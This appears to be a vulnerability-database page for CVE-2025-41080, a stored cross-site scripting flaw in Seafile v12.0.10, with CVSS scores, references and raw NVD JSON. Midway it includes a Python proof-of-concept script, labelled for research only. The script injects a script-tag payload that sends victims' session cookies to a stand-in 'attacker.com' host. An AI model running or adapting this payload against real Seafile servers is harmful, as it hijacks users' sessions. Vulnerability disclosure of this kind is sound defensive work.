CVE-2025-41080

Description

A stored Cross-Site Scripting (XSS) vulnerability has been found in Seafile v12.0.10. This vulnerability allows an attacker to execute arbitrary code in the victim's browser by storing malicious payloads with POST parámetro 'p' in '/api/v2.1/repos/{repo_id}/file/'.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:seafile:seafile:*:*:*:*:*:*:*:* - VULNERABLE

Seafile v12.0.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-41080 Stored XSS PoC for Seafile v12.0.10
# Target: Seafile API endpoint /api/v2.1/repos/{repo_id}/file/
# Attack Vector: POST parameter 'p' contains malicious JavaScript payload

import requests
import json

TARGET_URL = "https://target-seafile-server.com"
REPO_ID = "your-repo-id-here"
API_ENDPOINT = f"{TARGET_URL}/api/v2.1/repos/{REPO_ID}/file/"

# Malicious XSS payload - steals session cookies
XSS_PAYLOAD = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>"

def exploit_stored_xss():
    """
    Exploit the stored XSS vulnerability by uploading a file with malicious content
    via the POST parameter 'p' in the Seafile API endpoint.
    """
    headers = {
        "Authorization": "Token your-auth-token",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    # Payload injection through POST parameter 'p'
    data = {
        "p": f"/path/to/file.txt{XSS_PAYLOAD}",
        "filename": f"malicious_file.txt{XSS_PAYLOAD}"
    }
    
    try:
        response = requests.post(API_ENDPOINT, headers=headers, data=data, verify=False)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        if response.status_code == 200:
            print("[+] XSS payload successfully stored on the server!")
            print("[+] Any user viewing this file will trigger the malicious script.")
        else:
            print("[-] Exploitation failed. Check credentials and target.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("[*] CVE-2025-41080 - Seafile Stored XSS Exploit")
    print("[*] Target: Seafile v12.0.10")
    exploit_stored_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41080
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41080
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41080/
[4] VulDB https://vuldb.com/cve/CVE-2025-41080
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-seafile

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41080", "sourceIdentifier": "[email protected]", "published": "2025-12-04T12:16:22.153", "lastModified": "2025-12-05T23:47:30.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-Site Scripting (XSS) vulnerability has been found in Seafile v12.0.10. This vulnerability allows an attacker to execute arbitrary code in the victim's browser by storing malicious payloads with POST parámetro 'p' in '/api/v2.1/repos/{repo_id}/file/'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:seafile:seafile:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.0.14", "matchCriteriaId": "B43AC885-C734-4A77-8BA1-0E1E46B21867"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-seafile", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}